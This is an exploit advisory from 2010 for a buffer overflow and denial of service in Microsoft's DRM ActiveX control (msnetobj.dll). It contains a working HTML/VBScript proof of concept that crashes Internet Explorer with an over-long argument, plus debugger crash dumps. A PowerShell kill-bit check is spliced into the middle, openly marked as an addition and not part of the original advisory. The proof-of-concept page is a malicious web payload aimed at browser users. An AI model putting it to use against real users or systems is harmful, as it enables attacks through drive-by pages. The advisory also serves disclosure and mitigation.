
Microsoft DRM Technology Active-X Overflow / Denial Of Service

Posted Sep 18, 2010
Authored by Asheesh Kumar Mani Tripathi

Microsoft DRM technology (msnetobj.dll) suffers from ActiveX-related buffer overflow and denial of service vulnerabilities.

tags | exploit, denial of service, overflow, vulnerability, activex
SHA-256 | c67e4e09d51917b4d4a68cf3c3fcbc0e03bc502047d6cba23d4185432556f03f

===========================================================================================

Microsoft DRM technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities

===========================================================================================

by

Asheesh Kumar Mani Tripathi


# Vulnerability Discovered By Asheesh Kumar Mani Tripathi

# email informationhacker08@gmail.com

# company www.aksitservices.co.in

# Credit by Asheesh Anaconda

# Date 18th Sep 2010

# Description: The Microsoft DRM ActiveX control in msnetobj.dll (ProgID MSNETOBJLib.RMGetLicense,
CLSID A9FC132B-096D-460B-B7D5-1DB0FAE0C062) suffers from multiple remotely triggerable
vulnerabilities: buffer overflow, integer overflow and denial of service (Internet Explorer crash).
The issue is triggered when an attacker convinces a victim to visit a malicious web page that
instantiates the control and scripts it.

The GetLicenseFromURLAsync method does not validate the length of its string arguments: passing
an over-long string (8212 characters in the proof of concept below) as the second argument,
bstrURL, causes an access violation inside the browser process.

Remote attackers may be able to exploit this issue to execute arbitrary machine code in the
context of the affected application, facilitating the remote compromise of affected computers.
Failed exploit attempts result in browser crashes. Note that the crash shown below faults on a
MOVS instruction inside ntdll.dll with EIP not under attacker control; it demonstrates the denial
of service, and the code-execution claim remains unverified until the corrupted structure is
identified.
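A defender-side check, added here and not part of the advisory: it reads the COM registration for the CLSID used in the proof of concept below, reports whether the control is marked safe for scripting or initialisation via its Implemented Categories, whether the Internet Explorer kill bit (Compatibility Flags 0x400) is set, and can set the kill bit, which is the standard mitigation for a vulnerable ActiveX control. The function names are mine; the registry paths and CATIDs are the documented COM registration and ActiveX Compatibility locations, and the Wow6432Node view is assumed to exist only on 64-bit Windows.

```powershell
# Added example, not code from the advisory. Run in an elevated PowerShell to apply the kill bit.

$Clsid = '{A9FC132B-096D-460B-B7D5-1DB0FAE0C062}'   # CLSID from the proof of concept

# Documented component categories a control registers to claim it is safe for use from script.
# (A control can also claim safety at runtime via IObjectSafety, so a missing category does not
# prove the control is unscriptable; it only means it does not claim safety statically.)
$SafeForScripting = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$SafeForInit      = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
$KillBit          = 0x400   # Compatibility Flags bit that stops IE instantiating the control

# Native and 32-bit views of the ActiveX Compatibility key (both matter on 64-bit Windows)
$CompatBases = @('HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility')
if ([Environment]::Is64BitOperatingSystem) {
    $CompatBases += 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
}

function Get-ActiveXExposure {
    param([Parameter(Mandatory)][string]$Clsid)

    $clsidKey   = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    $registered = Test-Path $clsidKey
    $server     = $null
    if ($registered) {
        $server = (Get-ItemProperty "$clsidKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
    }

    $cats       = "$clsidKey\Implemented Categories"
    $scriptSafe = Test-Path "$cats\$SafeForScripting"
    $initSafe   = Test-Path "$cats\$SafeForInit"

    # Merge the kill-bit flags from every compatibility view; any view with the bit set blocks IE
    $flags = 0
    foreach ($base in $CompatBases) {
        $key = Join-Path $base $Clsid
        if (Test-Path $key) {
            $v = (Get-ItemProperty $key -ErrorAction SilentlyContinue).'Compatibility Flags'
            if ($null -ne $v) { $flags = $flags -bor [int]$v }
        }
    }
    $killed = (($flags -band $KillBit) -ne 0)

    [pscustomobject]@{
        Clsid               = $Clsid
        Registered          = $registered
        Server              = $server
        SafeForScripting    = $scriptSafe
        SafeForInitializing = $initSafe
        KillBitSet          = $killed
        # Exposed: IE will create the control from a web page and let script call its methods
        Exposed             = ($registered -and -not $killed)
    }
}

function Set-ActiveXKillBit {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Clsid)

    foreach ($base in $CompatBases) {
        $key = Join-Path $base $Clsid
        if ($PSCmdlet.ShouldProcess($key, 'Set Compatibility Flags |= 0x400')) {
            if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
            $cur = (Get-ItemProperty $key -ErrorAction SilentlyContinue).'Compatibility Flags'
            Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Type DWord `
                -Value ([int]$cur -bor $KillBit)
        }
    }
}

Get-ActiveXExposure -Clsid $Clsid | Format-List
# Mitigate: Set-ActiveXKillBit -Clsid $Clsid -WhatIf    (drop -WhatIf to apply)
```

Exposed is true when the control is registered and no kill bit is present; after Set-ActiveXKillBit, re-running Get-ActiveXExposure should report KillBitSet true and Exposed false, and IE will refuse to create the object from the proof of concept page even though msnetobj.dll stays registered.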

=============================================Proof Of Concept=============================================



<object classid='clsid:A9FC132B-096D-460B-B7D5-1DB0FAE0C062' id='RM'></object>
<script language='vbscript'>

' Target description (metadata only; the call below uses just RM, arg1 and arg2)
targetFile = "C:\Windows\System32\msnetobj.dll"
prototype = "Sub GetLicenseFromURLAsync ( ByVal bstrXMLDoc As String , ByVal bstrURL As String )"
memberName = "GetLicenseFromURLAsync"
progid = "MSNETOBJLib.RMGetLicense"
argCount = 2

' bstrXMLDoc: any short value; bstrURL: 8212-character string that triggers the crash
arg1 = "defaultV"
arg2 = String(8212, "A")

' Call is required: VBScript rejects a parenthesised multi-argument procedure call used as a statement
Call RM.GetLicenseFromURLAsync(arg1, arg2)

</script>
=============================================Exception details=============================================
Exception Code: ACCESS_VIOLATION
Disasm: 77BEEA7F MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]

Seh Chain:
--------------------------------------------------
1 76E7E47D msvcrt.dll
2 77BB99FA ntdll.dll


Called From Returns To
--------------------------------------------------
ntdll.77BEEA7F ntdll.77BEE9D9
ntdll.77BEE9D9 KERNEL32.770E7F75
KERNEL32.770E7F75 ole32.779EB3E1
ole32.779EB3E1 ole32.779EB50A
ole32.779EB50A ole32.779AF6F6
ole32.779AF6F6 ole32.779AF794
ole32.779AF794 msnetobj.6B823726
msnetobj.6B823726 msnetobj.6B823814
msnetobj.6B823814 msnetobj.6B823C40
msnetobj.6B823C40 msnetobj.6B823FA7
msnetobj.6B823FA7 msnetobj.6B824513
msnetobj.6B824513 msnetobj.6B823A9D
msnetobj.6B823A9D msvcrt.76E82599
msvcrt.76E82599 msvcrt.76E826B3
msvcrt.76E826B3 KERNEL32.770ED0E9
KERNEL32.770ED0E9 ntdll.77BF19BB
ntdll.77BF19BB ntdll.77BF198E


Registers:
--------------------------------------------------
EIP 77BEEA7F
EAX 00000054
EBX 00032A78 -> Asc: GsHd(
ECX 00000000
EDX 00000004
EDI 035CEE28 -> 7FFD8000
ESI 6B821434
EBP 035CEE48 -> 035CEE90
ESP 035CEE0C -> 00032A78


Block Disassembly:
--------------------------------------------------
77BEEA68 PUSH EDI
77BEEA69 JNZ 77C25E3F
77BEEA6F TEST BYTE PTR [EBX+10],1
77BEEA73 JE 77C25E93
77BEEA79 MOV EAX,[EBX+18]
77BEEA7C LEA EDI,[EBP-20]
77BEEA7F MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI] <--- CRASH
77BEEA80 PUSH 77BEEABD
77BEEA85 MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
77BEEA86 PUSH 1C
77BEEA88 ADD EAX,EBX
77BEEA8A PUSH EDX
77BEEA8B MOVS DWORD PTR ES:[EDI],DWORD PTR [ESI]
77BEEA8C PUSH EAX
77BEEA8D LEA EAX,[EBP-20]


ArgDump:
--------------------------------------------------
EBP+8 00032A78 -> Asc: GsHd(
EBP+12 6B821434
EBP+16 035CEEB0 -> 00000040
EBP+20 00000000
EBP+24 77AC1424 -> 779EBEC8
EBP+28 6B821434


Stack Dump:
--------------------------------------------------
35CEE0C 78 2A 03 00 08 00 15 C0 00 00 00 00 B0 EE 5C 03 [..............\.]
35CEE1C 04 00 00 00 34 14 82 6B 00 90 FD 7F 00 80 FD 7F [.......k........]
35CEE2C 44 EE 5C 03 01 6C BF 77 68 EE 5C 03 84 EE 5C 03 [D.\..l.wh.\...\.]
35CEE3C 88 EE 5C 03 80 EE 5C 03 92 59 7C 75 90 EE 5C 03 [..\...\..Y.u..\.]
35CEE4C D9 E9 BE 77 78 2A 03 00 34 14 82 6B B0 EE 5C 03 [...w.......k..\.]



ApiLog
--------------------------------------------------

***** Installing Hooks *****
7735d5c0 RegCreateKeyExA (HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,(null))
Debug String Log
--------------------------------------------------